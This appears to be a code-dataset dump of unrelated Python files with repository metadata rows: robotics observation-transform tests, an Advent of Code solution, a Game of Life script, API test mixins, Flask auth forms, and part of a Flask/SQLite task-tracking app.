preprocessor.setup_io_spec(input_spec)
class CropImageObservationTest(absltest.TestCase):
def setUp(self):
super().setUp()
self._input_obs_name = 'input_obs'
self._output_obs_name = 'output_obs'
    # This has a shape of (4, 5, 3).
self._input_spec = testing_functions.random_array_spec(
shape=(4, 5, 3), dtype=float, name=self._input_obs_name)
self._input_observation_spec = {self._input_obs_name: self._input_spec}
self._input_obs_value = testing_functions.valid_value(self._input_spec)
self._input_timestep_spec = testing_functions.random_timestep_spec(
observation_spec=self._input_observation_spec)
self._input_timestep = testing_functions.random_timestep(
spec=self._input_timestep_spec,
observation={self._input_obs_name: self._input_obs_value})
spec_utils.validate_timestep(self._input_timestep_spec,
self._input_timestep)
def _get_expected_spec(self, value: np.ndarray):
return testing_functions.random_array_spec(
shape=value.shape, dtype=value.dtype, name=self._output_obs_name)
def testFullCrop(self):
"""Don't modify the input at all."""
processor = observation_transforms.CropImageObservation(
input_obs_name=self._input_obs_name,
output_obs_name=self._output_obs_name,
crop_width_relative=1.0,
crop_height_relative=1.0,
x_offset_relative=0.0,
y_offset_relative=0.0)
expected_value = self._input_obs_value
output_timestep_spec = processor.setup_io_spec(self._input_timestep_spec)
self.assertIn(self._output_obs_name, output_timestep_spec.observation_spec)
spec_utils.verify_specs_equal_unbounded(
self._input_spec.replace(name=self._output_obs_name),
output_timestep_spec.observation_spec[self._output_obs_name])
output_timestep = processor.process(self._input_timestep)
spec_utils.validate_timestep(output_timestep_spec, output_timestep)
np.testing.assert_almost_equal(
output_timestep.observation[self._output_obs_name], expected_value)
def testCropNoOffset(self):
"""Crop to a region that is in a corner of the original observation."""
processor = observation_transforms.CropImageObservation(
input_obs_name=self._input_obs_name,
output_obs_name=self._output_obs_name,
crop_width_relative=0.4,
crop_height_relative=0.75,
x_offset_relative=0.0,
y_offset_relative=0.0)
expected_value = self._input_obs_value[:3, :2]
output_timestep_spec = processor.setup_io_spec(self._input_timestep_spec)
self.assertIn(self._output_obs_name, output_timestep_spec.observation_spec)
spec_utils.verify_specs_equal_unbounded(
self._get_expected_spec(expected_value),
output_timestep_spec.observation_spec[self._output_obs_name])
output_timestep = processor.process(self._input_timestep)
spec_utils.validate_timestep(output_timestep_spec, output_timestep)
np.testing.assert_almost_equal(
output_timestep.observation[self._output_obs_name], expected_value)
def testSquareCropNoOffset(self):
"""Crop to a region that is in a corner of the original observation.
Leaving out the height parameter should default to a square crop.
"""
processor = observation_transforms.CropImageObservation(
input_obs_name=self._input_obs_name,
output_obs_name=self._output_obs_name,
crop_width_relative=0.4,
x_offset_relative=0.0,
y_offset_relative=0.0)
expected_value = self._input_obs_value[:2, :2]
output_timestep_spec = processor.setup_io_spec(self._input_timestep_spec)
self.assertIn(self._output_obs_name, output_timestep_spec.observation_spec)
spec_utils.verify_specs_equal_unbounded(
self._get_expected_spec(expected_value),
output_timestep_spec.observation_spec[self._output_obs_name])
output_timestep = processor.process(self._input_timestep)
spec_utils.validate_timestep(output_timestep_spec, output_timestep)
np.testing.assert_almost_equal(
output_timestep.observation[self._output_obs_name], expected_value)
def testCropWithOffset(self):
"""Crop to the center of the observation."""
processor = observation_transforms.CropImageObservation(
input_obs_name=self._input_obs_name,
output_obs_name=self._output_obs_name,
crop_width_relative=0.6,
crop_height_relative=0.5,
x_offset_relative=0.5,
y_offset_relative=0.5)
expected_value = self._input_obs_value[1:3, 1:4]
output_timestep_spec = processor.setup_io_spec(self._input_timestep_spec)
self.assertIn(self._output_obs_name, output_timestep_spec.observation_spec)
spec_utils.verify_specs_equal_unbounded(
self._get_expected_spec(expected_value),
output_timestep_spec.observation_spec[self._output_obs_name])
output_timestep = processor.process(self._input_timestep)
spec_utils.validate_timestep(output_timestep_spec, output_timestep)
np.testing.assert_almost_equal(
output_timestep.observation[self._output_obs_name], expected_value)
def testInvalidParams(self):
"""Ensure that invalid parameters cause Exceptions."""
# Zero width and height are invalid
with self.assertRaisesRegex(ValueError, 'zero'):
_ = observation_transforms.CropImageObservation(
input_obs_name=self._input_obs_name,
output_obs_name=self._output_obs_name,
crop_width_relative=0.,
crop_height_relative=0.,
x_offset_relative=0.,
y_offset_relative=0.)
# Negative width is invalid
with self.assertRaisesRegex(ValueError, 'width must be between'):
_ = observation_transforms.CropImageObservation(
input_obs_name=self._input_obs_name,
output_obs_name=self._output_obs_name,
crop_width_relative=-1.,
crop_height_relative=1.,
x_offset_relative=0.,
y_offset_relative=0.)
# Height > 1.0 is invalid
with self.assertRaisesRegex(ValueError, 'height must be between'):
_ = observation_transforms.CropImageObservation(
input_obs_name=self._input_obs_name,
output_obs_name=self._output_obs_name,
crop_width_relative=1.,
crop_height_relative=1.5,
x_offset_relative=0.,
y_offset_relative=0.)
# Offset > 1.0 is invalid
with self.assertRaisesRegex(ValueError, 'offset must be between'):
_ = observation_transforms.CropImageObservation(
input_obs_name=self._input_obs_name,
output_obs_name=self._output_obs_name,
crop_width_relative=0.6,
crop_height_relative=1.,
x_offset_relative=1.5,
y_offset_relative=0.)
class CropSquareAndResizeTest(absltest.TestCase):
def setUp(self):
super().setUp()
self._input_obs_name = 'input_obs'
self._output_obs_name = 'output_obs'
# This has a shape of (4,5)
self._input_spec = testing_functions.random_array_spec(
shape=(4, 5), dtype=float, name=self._input_obs_name)
self._input_observation_spec = {self._input_obs_name: self._input_spec}
self._input_obs_value = testing_functions.valid_value(self._input_spec)
self._input_timestep_spec = testing_functions.random_timestep_spec(
observation_spec=self._input_observation_spec)
self._input_timestep = testing_functions.random_timestep(
spec=self._input_timestep_spec,
observation={self._input_obs_name: self._input_obs_value})
spec_utils.validate_timestep(self._input_timestep_spec,
self._input_timestep)
def _get_expected_spec(self, value: np.ndarray):
return testing_functions.random_array_spec(
shape=value.shape, dtype=value.dtype, name=self._output_obs_name)
def testCropNoOffset(self):
"""Crop to a region that is in a corner of the original observation."""
processor = observation_transforms.CropSquareAndResize(
input_obs_name=self._input_obs_name,
output_obs_name=self._output_obs_name,
crop_width_relative=0.8,
side_length_pixels=4,
x_offset_relative=0.0,
y_offset_relative=0.0)
expected_value = self._input_obs_value[:4, :4]
output_timestep_spec = processor.setup_io_spec(self._input_timestep_spec)
self.assertIn(self._output_obs_name, output_timestep_spec.observation_spec)
spec_utils.verify_specs_equal_unbounded(
self._get_expected_spec(expected_value),
output_timestep_spec.observation_spec[self._output_obs_name])
output_timestep = processor.process(self._input_timestep)
spec_utils.validate_timestep(output_timestep_spec, output_timestep)
np.testing.assert_almost_equal(
output_timestep.observation[self._output_obs_name], expected_value)
def testScaledCropNoOffset(self):
"""Crop to a region that is in a corner of the original observation."""
processor = observation_transforms.CropSquareAndResize(
input_obs_name=self._input_obs_name,
output_obs_name=self._output_obs_name,
crop_width_relative=0.8,
side_length_pixels=8,
x_offset_relative=0.0,
y_offset_relative=0.0,
interpolation=cv2.INTER_NEAREST)
# Nearest neighbor sampling should just duplicate the original pixels
expected_value = np.repeat(
np.repeat(self._input_obs_value[:4, :4], 2, axis=0), 2, axis=1)
output_timestep_spec = processor.setup_io_spec(self._input_timestep_spec)
self.assertIn(self._output_obs_name, output_timestep_spec.observation_spec)
spec_utils.verify_specs_equal_unbounded(
self._get_expected_spec(expected_value),
output_timestep_spec.observation_spec[self._output_obs_name])
output_timestep = processor.process(self._input_timestep)
spec_utils.validate_timestep(output_timestep_spec, output_timestep)
np.testing.assert_almost_equal(
output_timestep.observation[self._output_obs_name], expected_value)
class PoseRelativeTest(absltest.TestCase):
def _check_spec_float_unchanged(self, dtype):
preprocessor = observation_transforms.PoseRelativeToEpisodeStart(
pos_obs_name='pos', quat_obs_name='quat')
# Generate the input spec and input timestep
input_obs_spec = {
'pos': specs.Array(shape=(3,), dtype=dtype, name='pos'),
'quat': specs.Array(shape=(4,), dtype=dtype, name='quat'),
}
input_spec = testing_functions.random_timestep_spec(
observation_spec=input_obs_spec)
first_input_timestep = testing_functions.random_timestep(
spec=input_spec,
step_type=dm_env.StepType.FIRST)
# Setup expectations.
expected_output_spec = input_spec
# Check the spec
output_spec = preprocessor.setup_io_spec(input_spec)
self.assertEqual(output_spec.observation_spec,
expected_output_spec.observation_spec)
# Check the timestep.
output_timestep = preprocessor.process(first_input_timestep)
spec_utils.validate_timestep(output_spec, output_timestep)
def test_spec_float32_unchanged(self):
self._check_spec_float_unchanged(dtype=np.float32)
def test_spec_float64_unchanged(self):
self._check_spec_float_unchanged(dtype=np.float64)
def test_initial_observations(self):
preprocessor = observation_transforms.PoseRelativeToEpisodeStart(
pos_obs_name='pos', quat_obs_name='quat')
# Generate the input spec and input timestep
input_obs_spec = {
'pos': specs.Array(shape=(3,), dtype=np.float64, name='pos'),
'quat': specs.Array(shape=(4,), dtype=np.float64, name='quat'),
}
input_spec = testing_functions.random_timestep_spec(
observation_spec=input_obs_spec)
input_obs = {
'pos': [1.0, -1.5, 3.2],
'quat': tr.euler_to_quat([0.1, 0.2, 0.3])
}
first_input_timestep = testing_functions.random_timestep(
spec=input_spec, step_type=dm_env.StepType.FIRST, observation=input_obs)
# Setup expectations.
expected_output_spec = input_spec
# Check the spec
output_spec = preprocessor.setup_io_spec(input_spec)
self.assertEqual(output_spec.observation_spec,
expected_output_spec.observation_spec)
# Check the timestep.
output_timestep = preprocessor.process(first_input_timestep)
spec_utils.validate_timestep(output_spec, output_timestep)
output_pos = output_timestep.observation['pos']
np.testing.assert_array_almost_equal(output_pos, [0., 0., 0.])
output_euler = tr.quat_to_euler(output_timestep.observation['quat'])
np.testing.assert_array_almost_equal(output_euler, [0., 0., 0.])
def test_relative_observations(self):
preprocessor = observation_transforms.PoseRelativeToEpisodeStart(
pos_obs_name='pos', quat_obs_name='quat')
# Generate the input spec and input timestep
input_obs_spec = {
'pos': specs.Array(shape=(3,), dtype=np.float64, name='pos'),
'quat': specs.Array(shape=(4,), dtype=np.float64, name='quat'),
}
input_spec = testing_functions.random_timestep_spec(
observation_spec=input_obs_spec)
input_obs = {
'pos': np.array([1.0, -1.5, 3.2]),
'quat': tr.euler_to_quat([0.0, 0.0, 0.0])
}
first_input_timestep = testing_functions.random_timestep(
spec=input_spec,
step_type=dm_env.StepType.FIRST,
observation=input_obs)
preprocessor.setup_io_spec(input_spec)
preprocessor.process(first_input_timestep)
pos_offset = np.array([0.1, -0.2, -0.3])
input_obs = {
'pos': (input_obs['pos'] + pos_offset),
'quat': tr.euler_to_quat([0.2, 0.0, 0.0])
}
second_input_timestep = testing_functions.random_timestep(
spec=input_spec,
step_type=dm_env.StepType.MID,
observation=input_obs)
output_timestep = preprocessor.process(second_input_timestep)
output_pos = output_timestep.observation['pos']
np.testing.assert_array_almost_equal(output_pos, pos_offset)
output_euler = tr.quat_to_euler(output_timestep.observation['quat'])
np.testing.assert_array_almost_equal(output_euler, [0.2, 0., 0.])
class StackObservationsTest(parameterized.TestCase):
@parameterized.parameters(
(False, (4,), (12,)),
(True, (4,), (3, 4)),
(False, (1,), (3,)),
(True, (1,), (3, 1)),
(False, (4, 4), (12, 4)),
(True, (4, 4), (3, 4, 4)),
)
def test_stack_observations_spec(
self, add_leading_dim, input_shape, output_shape):
# Generate the input spec and input timestep.
input_obs_spec = {
'pos': specs.Array(shape=input_shape, dtype=np.float32, name='pos'),
}
input_spec = _build_unit_timestep_spec(
observation_spec=input_obs_spec)
# Generate the expected stacked output spec.
expected_output_obs_spec = {
'pos': specs.Array(shape=output_shape, dtype=np.float32, name='pos'),
}
expected_output_spec = _build_unit_timestep_spec(
observation_spec=expected_output_obs_spec)
preprocessor = observation_transforms.StackObservations(
obs_to_stack=['pos'],
stack_depth=3,
add_leading_dim=add_leading_dim)
output_spec = preprocessor.setup_io_spec(input_spec)
self.assertEqual(expected_output_spec, output_spec)
@parameterized.parameters(
(False, (4,), (12,)),
(True, (4,), (3, 4)),
(False, (1,), (3,)),
(True, (1,), (3, 1)),
(False, (4, 4), (12, 4)),
(True, (4, 4), (3, 4, 4)),
)
def test_stack_observations(self, add_leading_dim, input_shape, output_shape):
# Generate the input spec.
input_obs_spec = {
'pos': specs.Array(shape=input_shape, dtype=np.float32, name='pos'),
}
input_spec = _build_unit_timestep_spec(
observation_spec=input_obs_spec)
preprocessor = observation_transforms.StackObservations(
obs_to_stack=['pos'],
stack_depth=3,
add_leading_dim=add_leading_dim)
preprocessor.setup_io_spec(input_spec)
input_pos = np.random.random(input_shape).astype(np.float32)
if add_leading_dim:
expected_output_pos = np.stack([input_pos for _ in range(3)], axis=0)
else:
expected_output_pos = np.concatenate(
[input_pos for _ in range(3)], axis=0)
input_timestep = testing_functions.random_timestep(
spec=input_spec,
step_type=dm_env.StepType.FIRST,
observation={'pos': input_pos,})
output_timestep = preprocessor.process(input_timestep)
output_pos = output_timestep.observation['pos']
np.testing.assert_allclose(expected_output_pos, output_pos)
np.testing.assert_allclose(expected_output_pos.shape, output_shape)
class AddObservationTest(absltest.TestCase):
def test_no_overwriting(self):
preprocessor = observation_transforms.AddObservation(
obs_name='pos',
obs_callable=lambda _: [1., 1., 1.])
# Generate the input spec and input timestep.
input_obs_spec = {
'pos': specs.Array(shape=(3,), dtype=np.float32, name='pos'),
'quat': specs.Array(shape=(4,), dtype=np.float32, name='quat'),
}
input_spec = testing_functions.random_timestep_spec(
observation_spec=input_obs_spec)
error_msg = 'Observation pos already exists.'
with self.assertRaisesWithLiteralMatch(ValueError, error_msg):
preprocessor.setup_io_spec(input_spec)
def test_fail_to_run_obs_callable(self):
preprocessor = observation_transforms.AddObservation(
obs_name='new_obs',
obs_callable=lambda timestep: timestep.observation['not_exist'])
# Generate the input spec and input timestep.
input_obs_spec = {
'pos': specs.Array(shape=(3,), dtype=np.float32, name='pos'),
'quat': specs.Array(shape=(4,), dtype=np.float32, name='quat'),
}
input_spec = testing_functions.random_timestep_spec(
observation_spec=input_obs_spec)
# The obs_callable is trying to use an observation named `not_exist` not
# present.
with self.assertRaisesRegex(KeyError, 'not_exist'):
preprocessor.setup_io_spec(input_spec)
def test_add_obs_correctly(self):
preprocessor = observation_transforms.AddObservation(
obs_name='new_obs',
obs_callable=lambda _: np.asarray([1., 1., 1.], dtype=np.float32))
# Generate the input spec and input timestep.
input_obs_spec = {
'pos': specs.Array(shape=(3,), dtype=np.float32, name='pos'),
'quat': specs.Array(shape=(4,), dtype=np.float32, name='quat'),
}
input_spec = testing_functions.random_timestep_spec(
observation_spec=input_obs_spec)
input_obs = {
'pos': np.array([1.0, -1.5, 3.2], dtype=np.float32),
'quat': np.asarray(tr.euler_to_quat([0.1, 0.2, 0.3]), dtype=np.float32)
}
input_timestep = testing_functions.random_timestep(
spec=input_spec, step_type=dm_env.StepType.MID, observation=input_obs)
# Setup the expected output specs.
expected_observation_spec = input_obs_spec.copy()
expected_observation_spec['new_obs'] = (
specs.Array(shape=[3,], dtype=np.float32, name='new_obs'))
expected_output_spec = copy.deepcopy(input_spec)
# Check the specs.
output_spec = preprocessor.setup_io_spec(input_spec)
self.assertEqual(output_spec.observation_spec,
expected_observation_spec)
self.assertEqual(output_spec.reward_spec,
expected_output_spec.reward_spec)
self.assertEqual(output_spec.discount_spec,
expected_output_spec.discount_spec)
# Check the timestep.
output_timestep = preprocessor.process(input_timestep)
spec_utils.validate_timestep(output_spec, output_timestep)
output_new_obs = output_timestep.observation['new_obs']
np.testing.assert_array_almost_equal(output_new_obs, [1., 1., 1.])
def test_add_obs_correctly_with_provided_specs(self):
new_obs_spec = specs.BoundedArray(
shape=(3,), dtype=np.int32, minimum=-1, maximum=3, name='new_obs')
preprocessor = observation_transforms.AddObservation(
obs_name='new_obs',
obs_callable=lambda _: np.array([1, 1, 1], dtype=np.int32),
obs_spec=new_obs_spec)
# Generate the input spec and input timestep.
input_obs_spec = {
'pos': specs.Array(shape=(3,), dtype=np.float32, name='pos'),
'quat': specs.Array(shape=(4,), dtype=np.float32, name='quat'),
}
input_spec = testing_functions.random_timestep_spec(
observation_spec=input_obs_spec)
input_obs = {
'pos': np.array([1.0, -1.5, 3.2], dtype=np.float32),
'quat': np.asarray(tr.euler_to_quat([0.1, 0.2, 0.3]), dtype=np.float32)
}
input_timestep = testing_functions.random_timestep(
spec=input_spec, step_type=dm_env.StepType.MID, observation=input_obs)
# Setup the expected specs.
expected_observation_spec = dict(input_obs_spec)
expected_observation_spec['new_obs'] = new_obs_spec
expected_output_spec = copy.deepcopy(input_spec)
output_spec = preprocessor.setup_io_spec(input_spec)
self.assertEqual(output_spec.observation_spec,
expected_observation_spec)
self.assertEqual(output_spec.reward_spec,
expected_output_spec.reward_spec)
self.assertEqual(output_spec.discount_spec,
expected_output_spec.discount_spec)
# Check the timestep.
output_timestep = preprocessor.process(input_timestep)
spec_utils.validate_timestep(output_spec, output_timestep)
output_new_obs = output_timestep.observation['new_obs']
np.testing.assert_array_almost_equal(output_new_obs, [1., 1., 1.])
def _build_unit_timestep_spec(
observation_spec: Optional[Mapping[str, specs.Array]] = None,
reward_spec: Optional[specs.Array] = None,
discount_spec: Optional[specs.BoundedArray] = None):
if observation_spec is None:
name = 'foo'
observation_spec = {
name: specs.Array(shape=(2,), dtype=_DEFAULT_TYPE, name=name),
}
if reward_spec is None:
reward_spec = scalar_array_spec(name='reward')
if discount_spec is None:
discount_spec = scalar_array_spec(name='discount')
return spec_utils.TimeStepSpec(
observation_spec=observation_spec,
reward_spec=reward_spec,
discount_spec=discount_spec)
if __name__ == '__main__':
absltest.main()
| 39.358037 | 80 | 0.706747 | 37,005 | 0.904923 | 0 | 0 | 13,818 | 0.337906 | 0 | 0 | 4,055 | 0.099161 |
a81fa302f2ff4cbc6dc18bbb647920f29a503d5e | 1,897 | py | Python | 2017/23b.py | mcbor/advent_of_code_2016 | 14453b970d3e0f031ae6a66f2028652b6ed870dd | ["MIT"] | 1 | 2016-12-17T10:53:22.000Z | 2016-12-17T10:53:22.000Z | 2017/23b.py | mcbor/adventofcode | 14453b970d3e0f031ae6a66f2028652b6ed870dd | ["MIT"] | null | null | null | 2017/23b.py | mcbor/adventofcode | 14453b970d3e0f031ae6a66f2028652b6ed870dd | ["MIT"] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
23b.py
~~~~~~
Advent of Code 2017 - Day 23: Coprocessor Conflagration
Part Two
Now, it's time to fix the problem.
The debug mode switch is wired directly to register a. You flip the switch,
which makes register a now start at 1 when the program is executed.
Immediately, the coprocessor begins to overheat. Whoever wrote this program
obviously didn't choose a very efficient implementation. You'll need to
optimize the program if it has any hope of completing before Santa needs
that printer working.
The coprocessor's ultimate goal is to determine the final value left in
register h once the program completes. Technically, if it had that... it
wouldn't even need to run the program.
After setting register a to 1, if the program were to run to completion,
what value would be left in register h?
:copyright: (c) 2017 by Martin Bor.
:license: MIT, see LICENSE for more details.
"""
import sys
import math
def is_prime(n):
if n < 2:
return False
if n < 4:
return True
if n % 2 == 0 or n % 3 == 0:
return False
i = 5
for i in range(5, int(math.sqrt(n)) + 1, 6):
if n % i == 0 or n % (i + 2) == 0:
return False
return True
def solve(instructions):
"""Return value of h.
Hand optimized.
"""
instr, reg, val = instructions.split('\n')[0].split()
assert instr == 'set'
assert reg == 'b'
b = int(val) * 100 + 100000
start = b - 17000
end = b + 1
return sum(not is_prime(x) for x in range(start, end, 17))
def main(argv):
if len(argv) == 2:
f = open(argv[1], 'r')
else:
sys.stderr.write('reading from stdin...\n')
f = sys.stdin
print(solve(f.read().strip()))
if __name__ == "__main__":
sys.exit(main(sys.argv))
| 24.012658 | 79 | 0.615709 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,109 | 0.584607 |
a81fc289f1eb7f0a4f761bd960c55555bea22c98 | 4,456 | py | Python | game_of_life.py | WinterWonderland/Game_of_Life | 99eced42146a195b6a7bc423f76f0fd79f5771d2 | ["MIT"] | null | null | null | game_of_life.py | WinterWonderland/Game_of_Life | 99eced42146a195b6a7bc423f76f0fd79f5771d2 | ["MIT"] | null | null | null | game_of_life.py | WinterWonderland/Game_of_Life | 99eced42146a195b6a7bc423f76f0fd79f5771d2 | ["MIT"] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Thu Sep 20 11:59:50 2018
@author: klaus
"""
import numpy as np
import matplotlib.pyplot as plt
import time
import random
from argparse import ArgumentParser, RawTextHelpFormatter
class GameOfLife:
def __init__(self, width, height, interval, seed):
random.seed(seed)
self.height = height
self.width = width
self.interval = interval
self.epoch = 0
self.board = np.zeros((self.height, self.width))
for x in range(int(self.width / 2 - self.width / 4), int(self.width / 2 + self.width / 4 + 1)):
for y in range(int(self.height / 2 - self.height / 4), int(self.height / 2 + self.height / 4 + 1)):
self.board[y][x] = random.choice([0, 1])
self.fig, self.ax = plt.subplots(figsize=(10, 10), num=1)
self.fig.show()
self.plot_board()
def run(self):
while self.run_step():
time.sleep(self.interval)
def run_step(self):
self.epoch += 1
new_board = self.board.copy()
for x in range(self.width):
for y in range(self.height):
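                # Count the 8 neighbors of (x, y), wrapping around the board
                # edges (toroidal topology).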
living_neighbors = self.board[y - 1 if y > 0 else self.height - 1][x - 1 if x > 0 else self.width - 1] + \
self.board[y - 1 if y > 0 else self.height - 1][x] + \
self.board[y - 1 if y > 0 else self.height - 1][x + 1 if x < self.width - 1 else 0] + \
self.board[y][x - 1 if x > 0 else self.width - 1] + \
self.board[y][x + 1 if x < self.width - 1 else 0] + \
self.board[y + 1 if y < self.height - 1 else 0][x - 1 if x > 0 else self.width - 1] + \
self.board[y + 1 if y < self.height - 1 else 0][x] + \
self.board[y + 1 if y < self.height - 1 else 0][x + 1 if x < self.width - 1 else 0]
if self.board[y][x] == 0 and living_neighbors == 3:
new_board[y][x] = 1
if self.board[y][x] == 1 and (living_neighbors < 2 or living_neighbors > 3):
new_board[y][x] = 0
if (self.board == new_board).all():
return False
self.board = new_board
self.plot_board()
return True
def plot_board(self):
print("Epoch:", self.epoch)
self.ax.clear()
self.ax.imshow(self.board, cmap="Greys", interpolation="None")
self.fig.canvas.draw()
self.fig.canvas.flush_events()
if __name__ == "__main__":
argument_parser = ArgumentParser(description="""
Game of Life:
- Little python implementation of Conway's game of life.
- The game board will be visualized with matplotlib.
    - See readme.md for more information.""",
epilog="https://github.com/WinterWonderland/Game_of_Life",
formatter_class=RawTextHelpFormatter)
argument_parser.add_argument("--width",
metavar="",
type=int,
default=100,
help="The width of the game board (default=100)")
argument_parser.add_argument("--height",
metavar="",
type=int,
default=100,
help="The width of the game board (default=100)")
argument_parser.add_argument("--interval",
metavar="",
type=float,
default=0.3,
help="Interval time between each step (default=0.3)")
argument_parser.add_argument("--seed",
metavar="",
type=int,
default=None,
help="A seed for the random number generator to get identical play boards")
args = argument_parser.parse_args()
GameOfLife(width=args.width,
height=args.height,
interval=args.interval,
seed=args.seed).run()
input("press enter to quit")
| 41.64486 | 123 | 0.47711 | 2,446 | 0.548923 | 0 | 0 | 0 | 0 | 0 | 0 | 623 | 0.139811 |
a82054bcbbc93091d6cde0c3bba2fa420fc0e4b0 | 520 | py | Python | tests/mixins/back_tests.py | StuartMacKay/ebird-api | 14b5c777548416a58abec05e25cd4b9a8e22f210 | ["MIT"] | 9 | 2020-05-16T20:26:33.000Z | 2021-11-02T06:24:46.000Z | tests/mixins/back_tests.py | StuartMacKay/ebird-api | 14b5c777548416a58abec05e25cd4b9a8e22f210 | ["MIT"] | 17 | 2019-06-22T09:41:22.000Z | 2020-09-11T06:25:21.000Z | tests/mixins/back_tests.py | ProjectBabbler/ebird-api | 14b5c777548416a58abec05e25cd4b9a8e22f210 | ["MIT"] | null | null | null |
from ebird.api.constants import DEFAULT_BACK
from tests.mixins.base import BaseMixin
class BackTestsMixin(BaseMixin):
def test_back_is_sent(self):
query = self.api_call(back=10)[1]
self.assertEqual(query["back"], 10)
def test_default_back_is_not_sent(self):
query = self.api_call(back=DEFAULT_BACK)[1]
self.assertTrue("back" not in query)
def test_invalid_back_raises_error(self):
self.api_raises(ValueError, back=31)
self.api_raises(ValueError, back="x")
| 30.588235 | 51 | 0.709615 | 432 | 0.830769 | 0 | 0 | 0 | 0 | 0 | 0 | 15 | 0.028846 |
a820c01ed9ab1a3512b23d858002b832b81b6f26 | 506 | py | Python | examples/snippets/data_io/df_connect/export_simple.py | nguyentr17/tamr-toolbox | 1d27101eda12f937813cdbfe27e2fa9c33ac34d2 | ["Apache-2.0"] | 6 | 2021-02-09T22:27:55.000Z | 2022-01-14T18:15:17.000Z | examples/snippets/data_io/df_connect/export_simple.py | nguyentr17/tamr-toolbox | 1d27101eda12f937813cdbfe27e2fa9c33ac34d2 | ["Apache-2.0"] | 34 | 2021-02-09T22:23:33.000Z | 2022-03-31T16:22:51.000Z | examples/snippets/data_io/df_connect/export_simple.py | nguyentr17/tamr-toolbox | 1d27101eda12f937813cdbfe27e2fa9c33ac34d2 | ["Apache-2.0"] | 12 | 2021-02-09T21:17:10.000Z | 2022-02-09T16:35:39.000Z |
"""
Export data from Tamr using df-connect. An example where everything is default in config file,
which implies exported data is written back to same database as ingested from.
"""
import tamr_toolbox as tbox
my_config = tbox.utils.config.from_yaml("examples/resources/conf/connect.config.yaml")
my_connect = tbox.data_io.df_connect.client.from_config(my_config)
tbox.data_io.df_connect.client.export_dataset(
my_connect, dataset_name="example_dataset", target_table_name="example_target_table",
)
| 36.142857 | 94 | 0.8083 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 265 | 0.523715 |
a822bff3f043bc516ac3c82ab2394920c525256d | 1,700 | py | Python | services/web/project/auth/forms.py | petervuyk456/persona_finance | 5c4c1bea0e176f37cc122571b846de1f020bdd92 | ["MIT"] | null | null | null | services/web/project/auth/forms.py | petervuyk456/persona_finance | 5c4c1bea0e176f37cc122571b846de1f020bdd92 | ["MIT"] | null | null | null | services/web/project/auth/forms.py | petervuyk456/persona_finance | 5c4c1bea0e176f37cc122571b846de1f020bdd92 | ["MIT"] | null | null | null |
from flask_wtf import FlaskForm
from wtforms import StringField, PasswordField, BooleanField
from wtforms.validators import DataRequired, Length, EqualTo, URL
from project.auth.models import User
class LoginForm(FlaskForm):
username = StringField('Username', [DataRequired(), Length(max=64)])
password = PasswordField(
'Password', [DataRequired(), Length(min=6, max=255)])
remember = BooleanField("Remember Me")
def validate(self):
check_validate = super(LoginForm, self).validate()
if not check_validate:
return False
user = User.objects.get(username=self.username.data)
if not user:
self.username.errors.append('Invalid username or password')
return False
if not user.check_password(self.password.data):
self.username.errors.append('Invalid username or password')
return False
return True
class RegisterForm(FlaskForm):
username = StringField('Username', [DataRequired(), Length(max=64)])
password = PasswordField(
'Password', [DataRequired(), Length(min=6, max=255)])
confirm = PasswordField('Confirm Password', [
DataRequired(), EqualTo('password')])
def validate(self):
check_validate = super(RegisterForm, self).validate()
# if our validators do not pass
if not check_validate:
return False
try:
user = User.objects.get(username=self.username.data)
if user:
self.username.errors.append(
"User with that name already exists")
return False
        except Exception:
return True
| 32.075472 | 72 | 0.629412 | 1,498 | 0.881176 | 0 | 0 | 0 | 0 | 0 | 0 | 208 | 0.122353 |
a82471d2b32cd5726156914bf073feb69a5965b8 | 10,619 | py | Python | projectGo.py | KyleBrownCS/SoftDev2 | c992061a849f19f1ccbea71e4c0aa97fb2e135dc | ["MIT"] | null | null | null | projectGo.py | KyleBrownCS/SoftDev2 | c992061a849f19f1ccbea71e4c0aa97fb2e135dc | ["MIT"] | null | null | null | projectGo.py | KyleBrownCS/SoftDev2 | c992061a849f19f1ccbea71e4c0aa97fb2e135dc | ["MIT"] | null | null | null |
from flask import Flask, render_template, request, jsonify
import sqlite3
import json
import re
import logging
from applicationInfo import ApplicationInfo
logging.basicConfig(filename='/var/www/SoftDev2/projectGo.log', level=logging.DEBUG)
app = Flask(__name__)
applicationInfo = ApplicationInfo()
row_pos_obligationid = 0
row_pos_userid = 1
row_pos_name = 2
row_pos_description = 3
row_pos_starttime = 4
row_pos_endtime = 5
row_pos_priority = 6
row_pos_status = 7
row_pos_category = 8
def get_db():
db_connection = sqlite3.connect(applicationInfo.database_filepath)
db_cursor = db_connection.cursor()
return db_connection, db_cursor
@app.route('/')
def index():
return render_template("index.html")
@app.route('/addobligation')
def add_obligation_page():
return render_template("addobligation.html")
@app.route('/obligations', methods = ['GET'])
def get_all_obligations():
db_connection, db_cursor = get_db()
response = ""
data = []
for row in db_cursor.execute("select * from " + applicationInfo.OBLIGATION_TABLE_NAME):
obligation_entry = {
'obligationid' : row[row_pos_obligationid], #obligationid
'userid' : row[row_pos_userid], #userid
'name' : row[row_pos_name], #name
'description' : row[row_pos_description], #description
'starttime' : row[row_pos_starttime], #starttime
'endtime' : row[row_pos_endtime], #endtime
'priority' : row[row_pos_priority], #priority
'status' : row[row_pos_status], #status
'category' : row[row_pos_category]} #category
data.append(obligation_entry)
response = json.dumps(data)
return response, 200
@app.route('/schedule')
def sched():
return render_template("Schedule.html")
@app.route('/obligationlist')
def obligationlist():
return render_template("ObligationList.html")
@app.route('/obligations/<startTime>', methods = ['GET'])
def get_obligations_by_date(startTime):
db_connection, db_cursor = get_db()
response = ""
response_code = None
data = []
    count = 0
for row in db_cursor.execute("select * from " + applicationInfo.OBLIGATION_TABLE_NAME):
start_time = row[row_pos_starttime]
time_split = start_time.split(" ", 1)
start_time = time_split[0]
start_time.replace("'", "")
if start_time == startTime:
obligation_entry = {'obligationid' : row[row_pos_obligationid], #obligationid
'userid' : row[row_pos_userid], #userid
'name' : row[row_pos_name], #name
'description' : row[row_pos_description], #description
'starttime' : row[row_pos_starttime], #starttime
'endtime' : row[row_pos_endtime], #endtime
'priority' : row[row_pos_priority], #priority
'status' : row[row_pos_status], #status
'category' : row[row_pos_category]} #category
data.append(obligation_entry)
response = json.dumps(data)
count = count + 1
if 0 == count:
response_code = 404
else:
response_code = 200
return response, response_code
@app.route('/obligations/<int:obligation_id>', methods = ['GET'])
